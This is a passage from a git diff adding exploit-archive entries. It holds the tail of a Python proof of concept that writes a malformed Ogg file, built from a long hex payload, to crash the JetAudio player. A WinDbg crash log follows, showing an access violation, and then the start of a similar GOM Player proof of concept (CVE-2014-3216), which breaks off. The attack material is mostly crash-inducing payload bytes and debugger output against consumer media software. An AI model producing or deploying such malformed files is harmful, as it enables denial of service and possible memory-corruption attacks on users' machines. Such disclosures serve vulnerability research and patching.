7\x91\x16\xB3\x75\x5F\xF4\xDE\x00\x1A\x2F\x77\xA6\xD3\x9F\x9F\x52\xEC\x25\xA3\xD3\x23\xE3\x0B\xD6\x8D\x64\xC2\x50\xA1\x43\x85\xA1\xDE\x84\x1C\x18\xD9\x16\x38\x00\x36\x9A\x0D\x40\x0E\xE6\x3F\x03\x92\x1B\xC9\xFA\x3A\xB5\x45\x44\x0D\xE6\x3F\x07\xC2\x44\xAA\xFD\x67\x1D\x79\xD1\xFA\x63\x4D\x62\x76\xF3\xF2\xD1\x38\x1C\x67\x77\x5B\x37\x4F\x9E\x71\x61\xCC\xC7\xCE\x8C\x58\xCE\xE7\x43\xC2\xDE\xB6\x59\xA3\xE5\xCA\x34\x3D\x17\x00\x00\x00\x00\x00\xA6\x0D\x6E\x36\xFA\xCF\xAC\x72\x63\x0F\xBA\xDB\xCE\x33\xB5\x5A\xCE\x3F\x99\x57\x7B\xA8\xBB\x38\x5F\x3A\xBC\x69\x9A\x93\x63\xEB\x6F\x59\x7C\x57\xBE\xF6\xAE\x97\xF6\xD7\xBF\x27\x1D\x79\x3C\x8C\xD2\x67\xD6\xF3\x35\xB8\xE0\xFE\xF1\x7A\xF1\xF5\xEA\x73\xEE\xF5\xFB\xD1\xEE\x5C\xE2\x93\xC7\x5D\x45\x9D\x5D\xD7\x8A\xB2\x81\xDD\x9B\x86\xDA\x4B\xD5\xD6\x00\xB5\x09\x8F\x2B\x4E\x7B\x20\x4B\x78\xAD\x35\xB9\xD5\xD3\xD5\xE7\x4B\x9B\x9E\xF3\x25\xAE\x47\xEA\xA8\xE0\xB1\xDF\x8F\x1A\x6D\x92\x8F\xB0\x3E\xFF\xC1\x8C\xE3\x6F\xA2\x08\x0A\x1F\xFC\x55\x1E\x0D\x5F\xD9\xAA\x8B\xCA\xCA\xCA\x4E\x9A\x66\xF3\x4B\x24\xE7\x26\x14\x63\x0D\x87\x81\xE7\x57\x7D\x55\xCF\x9D\x99\xD5\xF1\x35\x69\x2A\xEB\xF5\x7D\x4E\x36\x5D\x59\x2A\x86\x1A\xB6\x6A\x5D\x5B\xF0\x9A\x6C\x5B\xE7\xA3\xAA\xBD\x1C\x9F\x54\x0D\x1B\x20\xAD\x86\xDD\xEB\x7D\x9E\x2C\x24\xAA\x18\xB5\xC0\xE4\x93\xB9\xC9\x65\x22\x90\x29\x73\x4B\x8D\xBE\x2D\xA6\x23\x8B\x9D\xF0\xA6\xA4\xA6\x7D\x57\xA7\x7D\xBC\x5B\x08\x0B\x02\x6C\x49\x36\x72\xE8\x40\x86\x77\xCB\x7F\x0D\xFF\x2E\xBF\xCB\xB6\x90\x02\x51\x53\x0F\x15\xE3\xC9\x50\x41\x15\xB4\x72\x4B\x36\xE2\xA1\x46\xC7\x46\xBD\xB5\xDA\x94\x33\xA8\xED\x60\xF8\x01\xCC\x24\x20\x00\xB8\xDB\x07\x98\xED\xEF\xDB\x22\x81\xC3\xFE\xF2\xFC\xBA\x14\xFB\x1D\xCF\x06\xD7\xE3\xB8\xFC\x3D\x6F\xD0\xDE\xD0\x61\xFE\x1C\xAF\xB9\x72\xE3\xED\xC2\xA2\xB8\xF6\x6E\x5E\x1A\xF8\xF0\xB5\x61\xFC\xD1\x06\xDC\x8A\x05\x35\xE6\xA5\x26\x07\xA9\xE2\x52\x8E\xFF\x84\xBA\x6E\xFE\x00\xDB\x2C\xC8\xEC\x89\x01\xC0\x83\x25\xC0\xF4\xA5\xD3\x70\xFC\xDF\x9C\xB9\xEB\x85\x25\xCA\x3D\xF1\xE1\x8A\x6E\xEB\xEB\x2F\xFC\x64\x53\xC6\x7A\x36\xE5\x9B\xE7\xBD\xE9\x9C\x67\xF2\xF2\xB8\x79\x79\x70\x72\xEF\x75\xAE\x07\x69\x89\x6E\x7F\xF9\x51\xE5\xA4\xDF\x02\x00\xAC\x5E\x23\xBF\x41\xCE\xDD\x99\xDA\x8D\x3C\x9D\x87\xFA\xD6\xB1\x7D\xD7\xA7\x75\xDB\xAC\xE5\x04\xE9\xB0\x1B\xC7\x0D\x3C\x55\x6D\x67\xDF\x9A\x9F\xEF\xBF\x74\x36\x77\x23\x1F\xEB\xB5\xF7\xEA\x9D\x6A\xAE\x9B\x6F\xD5\xDD\xB7\x65\xAF\xF7\x97\x16\x23\xDF\xD4\xC3\xA5\x73\xFB\x1F\x14\x79\xFC\xE2\x95\xBF\xB0\xD7\xA8\xC1\x92\x65\x3B\xDB\x3D\x1F\xF3\x45\x00\xC4\x76\x75\x39\xCC\xD4\xF4\x20\xD4\x3B\xE0\x23\xA6\xD4\x24\xFC\x03\xAC\xFB\x82\x8A\xE7\xDB\x93\x00\xFD\x1A\xC0\xB0\xDE\x9B\x2F\x5C\x47\x3F\x3D\x8F\xF1\xFF\x86\x5D\x6E\xBE\x7E\x8D\x17\x5F\x99\xD7\xF2\x3A\x18\xAC\x63\xD2\xFD\x1D\x1C\x3B\x4B\xA9\xFE\xA2\x6A\x4F\x1E\xFF\x8C\xEE\xD6\x48\xAA\xA2\x47\xE7\xDF\xBC\x2C\xB8\xF5\xA4\x03\x9A\x9A\x0D\xE1\x1C\xF4\x3F\x07\xC5\x44\x12\x5E\x68\xB6\x00\x52\xE0\xBF\x01\x23\x4C\x24\x91\xFB\x03\x00\xE4\x6B\xF1\xE1\xEC\xD1\xD9\xEC\x26\xA2\xDF\x04\xE7\xC9\x49\x9E\x74\xCA\x03\xCC\xFD\x38\xF6\xAA\xA0\xA5\x1B\x9E\x8C\x31\x55\x19\x00\x00\xC6\x44\x12\x21\x22\x76\x1B\xDC\x9E\xBF\xD3\x47\x0D\x39\xE5\xE5\xEB\xB3\xB8\xF4\xF5\x4B\xBF\xD2\x99\xEE\xD3\x71\x8F\xA6\xE1\xB8\x3D\x1B\x0D\x4A\x69\x8A\x97\xB6\xEB\x82\xB1\x62\x17\x35\xBD\x99\x1B\xA0\x59\xD8\xB4\x96\x30\x5A\x83\xB3\x67\x88\xCE\xB5\xD3\xB9\x57\x35\x86\x46\x13\x9D\xED\xE8\x59\xBA\xEB\xBE\x5A\x5A\x74\xD2\xBF\x2F\x2B\x66\x2B\xCF\xF1\x7D\x41\x7C\xCE\x9B\xC6\x2F\xD5\x59\xB3\x85\x7A\x34\xA3\xFD\x9E\xD8\x1E\xE9\xB5\x8E\xC6\x76\x40\x3B\x1D\xAE\xC7\xE5\x25\xDF\x7E\xF6\x62\x5B\xE0\xA0\xA6\xBB\x67\x49\xA2\x7D\xA3\x8B\x0D\x30\xFF\xFB\xFE\x9B\x83\xEA\x99\x02\x4D\xD4\x26\x92\xBA\x78\xC9\x17\xAD\x79\xBF\x58\x50\xCE\x1C\x9B\x2E\xCF\x6B\x91\xA8\x17\xD7\xAB\x9A\xDE\xCC\x28\x93\x33\xEF\x8D\xA9\xBB\xDE\x4A\xBC\x75\x4A\xDE\x52\xE7\x49\x3F\x62\x26\xF8\xCC\x46\xB5\x49\xA0\xE1\xD7\x79\x89\x28\xFA\x12\x9B\xCE\x8D\x48\x98\x35\xBB\xF3\xFE\xEA\x9E\x36\x3D\x9B\xD9\xC9\x34\xD6\xDD\x0D\xB0\xBB\xA6\x99\x5C\x69\xD8\x7D\xC9\xDF\x19\x47\x20\x23\x61\xD9\x46\x16\xE8\x46\xC6\xD8\xC2\x13\x73\x8D\x6F\xF8\xFE\x76\x5A\xF8\xF9\x77\x77\xAD\x8B\x37\x73\x32\x95\xD5\x11\x38\x70\x7F\x60\xD9\x60\x1C\x5A\xC2\x0A\xE4\x3F\xC2\x96\x1D\xD0\x00\x0E\x98\x15\xC0\xF0\x1E\xC7\x82\xDE\x07\xD3\x85\x7C\x48\x2F\xF0\xC4\x31\xAD\xC4\xD1\x36\x40\x21\x08\x7E\xDB\x45\x20\x07\xF9\xAF\x81\xF2\x22\x59\x5B\xEF\x96\xC5\x18\xEC\xBF\x06\xC2\x46\x12\xFC\xBD\xFE\xB4\x57\x62\x2F\x7C\x03\x67\x94\xB0\xCF\x39\x6B\x6B\xA3\x32\x2D\x75\x61\x00\x00\x00\x00\x80\xC9\xFB\xD3\x63\x26\xEA\xE7\xC7\xB7\x5F\x5F\xA7\x06\x1B\x93\x7B\x0D\x87\xB3\x8D\xC9\x91\xB3\xDD\x5B\x75\x1D\xB7\x9B\x7E\x65\xA2\xDA\x3B\x48\x5A\x5E\x27\x9A\xB5\x95\x37\xBB\xAB\xF2\x97\xC7\x07\x85\x26\xE7\x68\xD5\x74\xCE\xC9\xB6\x4B\xE5\xF1\xBA\x0F\x44\x48\xB8\x27\xD4\xDD\xA9\x3C\xB2\xEE\x55\x4F\xDA\x6C\xFC\xCA\xDE\xCF\xB0\x32\x9F\x28\xD8\xE1\x97\xBF\xB4\x2B\xCF\x53\x35\xE7\x92\x1C\xBB\x39\xFA\xE5\xE5\xF8\x99\x07\xDC\x1B\x77\xBA\xA9\x0E\x89\xCE\xC2\xD9\xF7\x6F\xE7\xC1\x43\x47\x56\x9E\x99\x9D\x86\x86\x9F\x7A\xB4\x6F\xB9\x6F\x49\x40\x29\x87\xAB\xAF\x6E\x5A\xF5\x44\x53\x71\xF5\xF4\x94\xEF\xE6\xF9\x0F\x31\xE7\x7D\xE3\x55\xAA\xF1\xD8\x84\x76\x35\x67\x32\x6E\x4F\x96\x93\xA5\xCE\x8C\x47\x91\x14\x9F\x35\x7D\x0C\xEF\xC7\xD6\x90\xEC\x7A\xBD\x7B\x8C\x72\x98\xEE\xBB\x78\x3D\x4E\xD7\xCC\x54\xDD\xC5\x5E\x46\x9E\x8A\xFA\x2D\xB9\xE8\xE9\x5D\x95\xBD\x4D\xA8\x9D\x73\x66\x21\x2B\xD7\x76\xC2\x74\xB5\xF7\xDC\xBD\x9F\x29\x8E\x71\x63\xFF\x5B\x12\x9B\x76\x3D\x61\xF8\xB6\xBC\x35\x71\x34\x33\xBF\xFF\x35\x7F\xFE\x2C\x05\xB6\x04\x18\x02\xFF\x0B\xDF\xC2\xE0\x47\x96\x83\x50\x8A\x58\xC2\xD0\x37\xD3\x10\xC3\x14\x51\x15\x45\x01\x1E\x7C\xA5\xAE\x06\xF3\x9F\x05\xC2\x40\xAA\xFD\x6F\x56\x9A\x18\x93\xFD\xE7\x4C\x62\xD8\x48\xD6\xB7\xDA\xF4\x2C\xAC\x63\x8F\x4E\x37\x38\x3B\x55\x30\xDA\x9C\x35\x5A\x6E\x15\x23\xC7\xCE\x00\x00\x00\x00\x00\xE9\x98\x31\x45\xEF\x87\xEF\x67\xE5\xD9\x7A\x7B\xE5\x60\xBD\xB2\x79\x98\xCC\xE2\xEC\xEA\x6B\x97\xD9\xC5\xEA\x14\x2B\x4D\x87\x31\x7E\x30\x7B\xBC\xC7\xC5\xC2\x7E\x5A\x31\x7F\xFD\xB7\xE9\xD1\xA7\x2F\x35\x3C\x2E\xE8\x28\xA3\xAF\x33\x1F\x31\xDE\x38\x13\x3B\x7F\x82\xBE\x23\x9D\x3C\xBF\x08\x3A\xBF\x1E\x26\xA9\xDD\x7B\xD4\x0D\x3F\x1C\x3A\xEB\x86\xCA\xF2\x4D\x48\x71\xE7\xD2\xFE\x1F\x7B\xAC\x25\x55\x22\x97\xC6\xBF\xFB\xA1\x2B\x67\xE3\xEF\xCC\xAC\x2F\xBB\x2A\x35\xEA\xC2\xF8\xE5\xE9\xDE\x69\x7E\x9D\x70\xA2\xA2\x71\x57\xC2\x6C\xC2\xDF\xE2\xEB\x39\xC9\x87\xEC\xD2\x5E\x45\x1D\x53\x5F\xEE\xBF\x3C\x66\x1B\x83\xB5\x5D\x43\x41\xA9\xD9\xFB\x22\x7F\xBD\x70\x73\x25\xF4\xFA\xFE\xCA\xE8\x88\xED\x73\x2E\xB9\x9C\x64\xA7\xB3\x61\x89\x7B\xDF\x11\x44\x52\xDF\x7A\xDC\x92\xEC\x7C\xA2\x2B\x8F\x92\x5C\x9B\xCE\x21\x1F\xC8\xCC\x15\xEF\x53\xB0\x5B\xE5\x51\x5F\x18\x72\x0F\x89\x7F\x69\x59\x10\x58\x36\xF8\x58\x15\x11\x6D\x96\x8E\xDB\xEF\xCD\x38\xC6\xA7\xEF\xE7\xFE\x68\x61\x61\x26\x5E\x15\x11\x95\xC7\xA6\x29\x02\xA6\x8A\x20\x2A\xC6\x91\x88\xBE\x6D\x99\x68\xF8\x2F\xB0\x1C\x38\xB0\x6C\x09\x05\x00\xBE\xAB\x85\x2E\x47\xC8\xFF\x0C\x22\xED\x55\x91\x28\xF2\xAD\x16\x53\x17\xF8\xCF\x19\x30\x90\x78\xAB\x93\x33\x37\xFD\xFB\xB9\xDF\x25\x5C\x5A\x01\xDB\x9C\xFB\x29\xA0\xDC\x67\xAB\x24\x13\xD2\x77\x06\x00\x00\x00\x00\xD8\xC9\x3C\x93\x47\x63\xF7\x34\xFE\xCF\xCC\x36\xDE\xF0\x6B\xEF\xE1\x64\xC2\x28\x91\xE3\xC1\x69\x0E\xC5\x2B\x2D\x39\xB7\xAD\xEB\x6E\xB6\x66\x64\xD7\x2F\x96\xA7\xCB\x3A\xFD\xB5\xF3\xFD\xD5\x43\xF5\xB0\x8D\xBD\xA9\xFE\x31\xA3\xFB\xAF\x0E\xB4\x8A\x60\xC6\x5C\x1A\x5D\xC7\xC1\xDC\x72\x65\x22\x0B\x7C\xC4\xDE\x77\x96\x9F\xAD\xC9\xD3\x33\xDB\xF9\x1F\x3D\x8F\x9C\x49\xA7\xE7\xF5\xBB\x15\xCF\xBB\x93\xF3\x2C\x6D\xF3\x6F\x8C\x35\x97\xFC\x85\xFB\xCE\x1C\xAE\xE1\x92\xD4\xE3\xF1\x3B\x6C\xAC\xD9\xB3\xC2\xDD\xDD\x25\x4E\x37\x8B\xC4\x38\x86\xFB\xBE\xEF\x6B\xEB\x83\x59\xEF\xF9\x15\xE8\x61\xAA\x9A\x66\xB7\x5E\xB6\x2A\xC9\x5E\xFC\x29\x31\x4D\x49\x6F\x9F\x48\xA8\x74\x1D\xE5\xE4\xEB\x3F\x97\x23\xB8\x17\x6C\x7E\xCA\x3F\x5C\xAA\xA4\xA7\x3C\x96\xBD\xF8\xFE\x74\x7F\xF0\xB7\xA9\x3D\x6D\x4D\xEF\x7D\xFF\x5C\x75\x8C\x2E\x7B\x36\x61\xB5\x30\x50\x11\xF0\xCB\x14\x64\x2D\x59\x3D\x9C\xA1\x7E\xEE\x1E\xCF\x90\x39\x4F\x6B\xD3\x1A\x26\x2B\xAC\xF6\x16\x2A\x26\x7A\xF3\xB6\xF5\xCD\x4B\xB0\x6F\x4E\x4B\x56\xEC\x3F\x72\x88\x25\x00\x59\x92\xC1\x96\xF4\x81\xE5\x2D\xD3\xDB\x67\x4B\x72\x53\x55\xCC\xDF\x31\xC4\xB0\xD7\x7B\x72\x33\xD4\x5F\xE4\xF0\xAF\xCF\x0E\x6D\x49\x78\x00\xBE\xAB\x85\x22\x46\xFD\xBF\x41\xC6\x56\x99\x53\xED\x67\xB5\x24\x4C\x71\xFD\x6F\x00\x03\xA9\xFE\x97\xC1\xB0\x76\x02\xA3\x8E\xD4\x29\xA0\xDA\x53\xAD\x72\x34\x7C\x30\x00\x8C\x30\x00\x00\x20\x72\x31\x5C\xFB\x63\x1B\xE5\xA9\x53\xFB\x75\x73\x54\x97\xDD\x6D\xB7\x36\x39\x36\xF5\x0B\xF1\xAE\x04\x0A\xDE\xF4\x91\x78\xC9\x51\xAF\xF1\x13\x6B\xF2\x95\x0F\xDB\x7B\x9F\x8C\xFD\xDF\x79\xF9\xE7\x0F\x07\xD9\x94\xCD\xEB\x94\xBA\xFD\xC7\xE4\xBA\xF6\xE7\xC1\x3C\x72\xAF\x8F\x8B\x33\x1E\x74\x72\x8B\x6C\xC5\x0F\x5D\xED\x93\x12\x1A\xFE\x77\xFF\xFB\xEA\xE4\xFD\x6D\x57\x33\xA6\x39\xD4\xA7\xC1\x65\x65\x73\xE5\x7F\x89\xCD\x66\x53\x03\xFB\x67\x15\x73\x95\x48\xF7\xA6\xE7\x79\x3A\xDD\x1C\x2D\xC7\xCF\x3C\xCE\xF1\xCC\xCC\xA9\xC7\xB9\x23\x1D\x39\x7C\x43\x64\xA9\x9B\x60\xA1\x7D\xF5\x4B\xC6\xDB\x05\x8C\xFC\xA5\xAC\x7B\x3C\x7D\xBE\xBE\xC9\x5B\x91\x71\xB3\x24\xBB\x8D\xEF\x3C\xEA\xDD\x47\x9E\xC8\xC9\x30\xF0\x9B\xA3\xBD\x16\x91\x48\xA2\x42\x4C\x6F\x42\xF5\x99\xCA\xA2\x12\xBA\xEE\xAE\x7D\x5E\x53\x9F\xF5\x01\x93\xC3\xE0\xEB\xA0\x15\x98\x33\x6A\xDD\x4F\x67\x67\x53\x00\x01\x00\x55\x00\x00\x00\x00\x00\x00\x55\x0B\x00\x00\x04\x00\x00\x00\x16\x3D\x35\xFD\x28\x46\xFF\x4C\xFF\x52\xFF\x4E\xFF\x6A\xFF\x53\x46\x51\x54\x53\x56\x52\x51\x58\x51\x52\x48\x44\x56\x54\x56\x56\x53\x58\x53\x51\x51\x56\x52\x57\x57\x55\x52\x57\x54\x3B\x0B\x66\x98\xFB\xBD\xAF\x64\x85\xD6\x55\x54\xFE\x7B\x37\xE0\x9C\x80\xCF\x62\x57\xBC\x6B\x61\xB2\xCC\xFF\xCA\xD2\x2F\x63\xD7\x28\x5C\x9E\xC7\x77\xA1\xDA\xBC\x9F\xFD\x42\x13\x9B\xA7\xA1\xA6\xAA\xA2\xE6\x49\xC5\x14\x11\x51\xC1\x90\xEF\x31\xB8\xFB\x58\x50\x70\x00\x10\x48\x00\x02\x3E\xCC\x65\xB1\x06\xFD\xCF\x81\x74\x33\x24\x0D" +outfile = file("jetaudio-poc.ogg", 'wb') +outfile.write(data) +outfile.close() +print "Created Poc" + +''' + +-------------------------------------------------------------------------------------------------------------------------- + +windbg result: + + +Microsoft (R) Windows Debugger Version 6.2.9200.16384 X86 +Copyright (c) Microsoft Corporation. All rights reserved. + +*** wait with pending attach +Symbol search path is: *** Invalid *** +**************************************************************************** +* Symbol loading may be unreliable without a symbol search path. * +* Use .symfix to have the debugger choose a symbol path. * +* After setting your symbol path, use .reload to refresh symbol locations. * +**************************************************************************** +Executable search path is: +ModLoad: 00400000 00b9b000 C:\Program Files\JetAudio\JetAudio.exe +ModLoad: 7c900000 7c9af000 C:\WINDOWS\system32\ntdll.dll +ModLoad: 7c800000 7c8f6000 C:\WINDOWS\system32\kernel32.dll +ModLoad: 10000000 1000f000 C:\Program Files\JetAudio\JetCfg.dll +ModLoad: 00ba0000 00c7d000 C:\Program Files\JetAudio\jdl_ximage.dll +ModLoad: 7e410000 7e4a1000 C:\WINDOWS\system32\USER32.dll +ModLoad: 77f10000 77f59000 C:\WINDOWS\system32\GDI32.dll +ModLoad: 78520000 785c3000 +C:\WINDOWS\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.30729.4974_x-ww_d889290f\MSVCR90.dll +ModLoad: 78480000 7850e000 +C:\WINDOWS\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.30729.4974_x-ww_d889290f\MSVCP90.dll +ModLoad: 003a0000 003e8000 C:\Program Files\JetAudio\jdl_exif.dll +ModLoad: 74ad0000 74ad8000 C:\WINDOWS\system32\POWRPROF.dll +ModLoad: 77dd0000 77e6b000 C:\WINDOWS\system32\ADVAPI32.dll +ModLoad: 77e70000 77f02000 C:\WINDOWS\system32\RPCRT4.dll +ModLoad: 77fe0000 77ff1000 C:\WINDOWS\system32\Secur32.dll +ModLoad: 77c10000 77c68000 C:\WINDOWS\system32\msvcrt.dll +ModLoad: 77f60000 77fd6000 C:\WINDOWS\system32\SHLWAPI.dll +ModLoad: 789e0000 78d81000 +C:\WINDOWS\WinSxS\x86_Microsoft.VC90.MFC_1fc8b3b9a1e18e3b_9.0.30729.4974_x-ww_a96f9c14\mfc90u.dll +ModLoad: 773d0000 774d3000 +C:\WINDOWS\WinSxS\X86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\COMCTL32.dll +ModLoad: 76380000 76385000 C:\WINDOWS\system32\MSIMG32.dll +ModLoad: 7c9c0000 7d1d7000 C:\WINDOWS\system32\SHELL32.dll +ModLoad: 774e0000 7761d000 C:\WINDOWS\system32\ole32.dll +ModLoad: 77120000 771ab000 C:\WINDOWS\system32\OLEAUT32.dll +ModLoad: 76b40000 76b6d000 C:\WINDOWS\system32\WINMM.dll +ModLoad: 771b0000 7725a000 C:\WINDOWS\system32\WININET.dll +ModLoad: 77a80000 77b15000 C:\WINDOWS\system32\CRYPT32.dll +ModLoad: 77b20000 77b32000 C:\WINDOWS\system32\MSASN1.dll +ModLoad: 77c00000 77c08000 C:\WINDOWS\system32\VERSION.dll +ModLoad: 76390000 763ad000 C:\WINDOWS\system32\IMM32.DLL +ModLoad: 629c0000 629c9000 C:\WINDOWS\system32\LPK.DLL +ModLoad: 74d90000 74dfb000 C:\WINDOWS\system32\USP10.dll +ModLoad: 5ad70000 5ada8000 C:\WINDOWS\system32\UxTheme.dll +ModLoad: 5d360000 5d36d000 +C:\WINDOWS\WinSxS\x86_Microsoft.VC90.MFCLOC_1fc8b3b9a1e18e3b_9.0.30729.4974_x-ww_19f00fd4\MFC90ENU.DLL +ModLoad: 013f0000 01457000 C:\Program Files\JetAudio\JetCrash.dll +ModLoad: 73000000 73026000 C:\WINDOWS\system32\WINSPOOL.DRV +ModLoad: 02800000 028c1000 C:\Program Files\JetAudio\dbghelp.dll +ModLoad: 74720000 7476c000 C:\WINDOWS\system32\MSCTF.dll +ModLoad: 732e0000 732e5000 C:\WINDOWS\system32\RICHED32.DLL +ModLoad: 74e30000 74e9d000 C:\WINDOWS\system32\RICHED20.dll +ModLoad: 755c0000 755ee000 C:\WINDOWS\system32\msctfime.ime +ModLoad: 76780000 76789000 C:\WINDOWS\system32\shfolder.dll +ModLoad: 01780000 0178b000 C:\Program Files\JetAudio\JFEFFB3D.DLL +ModLoad: 017b0000 017bb000 C:\Program Files\JetAudio\JFEFFBBE.DLL +ModLoad: 017e0000 017eb000 C:\Program Files\JetAudio\JFEFFDRC.DLL +ModLoad: 01810000 0181b000 C:\Program Files\JetAudio\JFEFFFX.DLL +ModLoad: 01960000 0196d000 C:\Program Files\JetAudio\JFEFFRVB.DLL +ModLoad: 01990000 0199b000 C:\Program Files\JetAudio\JFEFFWID.DLL +ModLoad: 019c0000 019cc000 C:\Program Files\JetAudio\JFEFFXB.DLL +ModLoad: 019f0000 019fe000 C:\Program Files\JetAudio\JFEFFEQ.DLL +ModLoad: 01aa0000 01b23000 C:\Program Files\JetAudio\JFEXRMC.DLL +ModLoad: 76c30000 76c5e000 C:\WINDOWS\system32\WINTRUST.dll +ModLoad: 76c90000 76cb8000 C:\WINDOWS\system32\IMAGEHLP.dll +ModLoad: 72d20000 72d29000 C:\WINDOWS\system32\wdmaud.drv +ModLoad: 72d10000 72d18000 C:\WINDOWS\system32\msacm32.drv +ModLoad: 77be0000 77bf5000 C:\WINDOWS\system32\MSACM32.dll +ModLoad: 77bd0000 77bd7000 C:\WINDOWS\system32\midimap.dll +ModLoad: 76f50000 76f58000 C:\WINDOWS\system32\wtsapi32.dll +ModLoad: 76360000 76370000 C:\WINDOWS\system32\WINSTA.dll +ModLoad: 5b860000 5b8b5000 C:\WINDOWS\system32\NETAPI32.dll +ModLoad: 02370000 02387000 C:\Program Files\JetAudio\JXCDMan.dll +ModLoad: 028d0000 02b95000 C:\WINDOWS\system32\xpsp2res.dll +ModLoad: 02610000 02618000 C:\Program Files\Internet Download +Manager\idmmkb.dll +ModLoad: 03280000 03288000 C:\Program Files\JetAudio\jdl_vorbisfile.dll +ModLoad: 03290000 03296000 C:\Program Files\JetAudio\jdl_ogg.dll +ModLoad: 03a80000 03c0c000 C:\Program Files\JetAudio\jdl_vorbis.dll +ModLoad: 031a0000 03230000 C:\Program Files\JetAudio\JXVidInfo.dll +ModLoad: 75a70000 75a91000 C:\WINDOWS\system32\MSVFW32.dll +ModLoad: 71ad0000 71ad9000 C:\WINDOWS\system32\wsock32.dll +ModLoad: 71ab0000 71ac7000 C:\WINDOWS\system32\WS2_32.dll +ModLoad: 71aa0000 71aa8000 C:\WINDOWS\system32\WS2HELP.dll +ModLoad: 76fd0000 7704f000 C:\WINDOWS\system32\CLBCATQ.DLL +ModLoad: 77050000 77115000 C:\WINDOWS\system32\COMRes.dll +ModLoad: 74810000 7497d000 C:\WINDOWS\system32\quartz.dll +ModLoad: 73f10000 73f6c000 C:\WINDOWS\system32\dsound.dll +ModLoad: 73ee0000 73ee4000 C:\WINDOWS\system32\KsUser.dll +ModLoad: 7d790000 7d99b000 C:\WINDOWS\system32\wmvcore.dll +ModLoad: 03dc0000 03e0f000 C:\WINDOWS\system32\DRMClien.DLL +ModLoad: 736b0000 736b7000 C:\WINDOWS\system32\msdmo.dll +ModLoad: 7e1e0000 7e282000 C:\WINDOWS\system32\urlmon.dll +ModLoad: 59a10000 59a4c000 C:\WINDOWS\system32\WMASF.DLL +ModLoad: 4b320000 4b349000 C:\WINDOWS\system32\wmidx.dll +ModLoad: 75cf0000 75d81000 C:\WINDOWS\system32\mlang.dll +ModLoad: 75f40000 75f51000 C:\WINDOWS\system32\devenum.dll +ModLoad: 03f30000 03f90000 C:\Program Files\Common Files\COWON\JetOGM.ax +ModLoad: 03fe0000 0403b000 C:\Program Files\Common Files\COWON\JetAVI.ax +ModLoad: 04440000 044b1000 C:\Program Files\Common Files\COWON\JetMKV.ax +ModLoad: 045c0000 0465c000 C:\Program Files\Common Files\COWON\JetMP4.ax +ModLoad: 04790000 047f7000 C:\Program Files\Common Files\COWON\JetMPG.ax +ModLoad: 04930000 0498c000 C:\Program Files\Common Files\COWON\JetFLV.ax +ModLoad: 590b0000 590ce000 C:\WINDOWS\system32\wmpasf.dll +ModLoad: 71b20000 71b32000 C:\WINDOWS\system32\MPR.dll +ModLoad: 6bf50000 6bfcd000 C:\WINDOWS\system32\dxmasf.dll +ModLoad: 57fd0000 57ff7000 C:\WINDOWS\system32\mpg2splt.ax +ModLoad: 04ad0000 04c2b000 C:\Program Files\Common Files\COWON\JetMPAd.ax +(cd0.6cc): Break instruction exception - code 80000003 (first chance) +*** ERROR: Symbol file could not be found. Defaulted to export symbols for +C:\WINDOWS\system32\ntdll.dll - +eax=7ffd9000 ebx=00000001 ecx=00000002 edx=00000003 esi=00000004 +edi=00000005 +eip=7c90120e esp=0332ffcc ebp=0332fff4 iopl=0 nv up ei pl zr na pe +nc +cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 +efl=00000246 +ntdll!DbgBreakPoint: +7c90120e cc int 3 +0:011> g +ModLoad: 03d10000 03d32000 C:\Program Files\JetAudio\JFAUDFP.DLL +ModLoad: 03d40000 03d52000 C:\Program Files\JetAudio\JFOGGRD.DLL +ModLoad: 03d80000 03d97000 C:\Program Files\JetAudio\JFWAVOUT.DLL +ModLoad: 03ed0000 03ed9000 C:\Program Files\JetAudio\JXOGGDec.dll +ModLoad: 03d10000 03da4000 C:\Program Files\JetAudio\JFDSPL.DLL +ModLoad: 77920000 77a13000 C:\WINDOWS\system32\setupapi.dll +(cd0.244): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +eax=00002620 ebx=04c40000 ecx=7ffdf000 edx=04c40608 esi=04c3db60 +edi=04c40180 +eip=7c9106f7 esp=0012cb58 ebp=0012cb64 iopl=0 nv up ei ng nz na po +cy +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 +efl=00210283 +ntdll!wcsncpy+0x198: +7c9106f7 f6460501 test byte ptr [esi+5],1 +ds:0023:04c3db65=?? +0:000> .load winext/msec.dll +0:000> !exploitable + +!exploitable 1.6.0.0 +*** ERROR: Symbol file could not be found. Defaulted to export symbols for +C:\Program Files\Common Files\COWON\JetMPAd.ax - +Exploitability Classification: UNKNOWN +Recommended Bug Title: Data from Faulting Address controls Branch Selection +starting at ntdll!wcsncpy+0x0000000000000198 (Hash=0x9a4f2dee.0x9c6d098e) + +The data from the faulting address is later used to determine whether or +not a branch is taken.''' \ No newline at end of file diff --git a/platforms/windows/dos/33335.py b/platforms/windows/dos/33335.py new file mode 100755 index 000000000..51ca8b0c8 --- /dev/null +++ b/platforms/windows/dos/33335.py @@ -0,0 +1,177 @@ +''' +# Exploit Title: [Gomplayer Memory Corruption vulnerability latest Version +2.2.57.5189 ] +# Date: [2014/05/06] +# Exploit Author: [Aryan Bayaninejad] +# Linkedin : https://www.linkedin.com/profile/view?id=276969082 +# Vendor Homepage: [www.gomlab.com] +# Software Link: [ +http://filehippo.com/download_gom_player/download/126691285c2a87ec66d7f74b48639f08/ +] +# Version: [Version 2.2.57.5189 and probably prior to that] +# Tested on: [Windows Xp Sp 3 x86] +# CVE : [CVE-2014-3216] + +details: + +Gomplayer version 2.2.57.5189 and prior to that are vulnerable to a memory +corruption vulnerability via a malformed ogg file format , Tested on +Windows XP Sp3 x86. + + +Poc: + +''' + +#!/usr/bin/python + +data = 